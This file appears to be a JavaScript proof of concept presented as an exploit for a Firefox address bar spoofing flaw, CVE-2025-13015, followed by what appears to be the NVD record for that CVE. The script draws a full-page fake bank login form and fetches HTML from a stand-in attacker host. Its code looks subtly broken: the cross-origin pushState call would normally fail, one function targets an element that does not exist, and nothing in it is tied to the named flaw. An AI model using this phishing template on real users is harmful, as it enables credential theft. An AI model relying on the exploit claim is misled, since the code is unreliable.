CVE-2025-13015

// CVE-2025-13015 Firefox Address Bar Spoofing PoC // This PoC demonstrates the address bar spoofing technique // Note: This is for educational/security research purposes only const poc = { // Step 1: Create a spoofed page that mimics a trusted site createSpoofedPage: function() { const fakePage = document.createElement('div'); fakePage.innerHTML = ` <div style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: #ffffff;"> <h1>Login to Your Bank</h1> <form> <input type="text" placeholder="Username" /> <input type="password" placeholder="Password" /> <button type="submit">Login</button> </form> </div> `; document.body.appendChild(fakePage); }, // Step 2: Manipulate history to change displayed URL manipulateHistory: function() { // Use history.pushState to change URL without navigation const targetUrl = 'https://www.bank-example.com'; history.pushState({path: targetUrl}, '', targetUrl); }, // Step 3: Load malicious content via iframe or fetch loadMaliciousContent: function() { // Attacker's malicious content loaded here fetch('https://attacker-controlled-site.com/fake-bank-ui') .then(response => response.text()) .then(html => { document.getElementById('malicious-content').innerHTML = html; }); }, // Defense detection isVulnerable: function() { const testUrl = 'https://test.example.com'; history.pushState({}, '', testUrl); const currentUrl = window.location.href; history.replaceState({}, '', window.location.pathname); return currentUrl.includes(testUrl); } }; // Execute PoC poc.createSpoofedPage(); poc.manipulateHistory(); // Export for testing if (typeof module !== 'undefined' && module.exports) { module.exports = poc; }

{"cve": {"id": "CVE-2025-13015", "sourceIdentifier": "[email protected]", "published": "2025-11-11T16:15:38.573", "lastModified": "2026-04-13T15:16:42.470", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spoofing issue in Firefox. This vulnerability was fixed in Firefox 145, Firefox ESR 140.5, and Firefox ESR 115.30."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.30.0", "matchCriteriaId": "6A363BA6-4A06-4794-B7DF-59B1624097BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "145.0", "matchCriteriaId": "445D5AED-0882-46FE-A5F1-B7148B923221"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "140.0", "versionEndExcluding": "140.5.0", "matchCriteriaId": "E7561CC5-C090-4099-A311-1A0E304111FE"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1994164", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-87/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-88/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-89/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}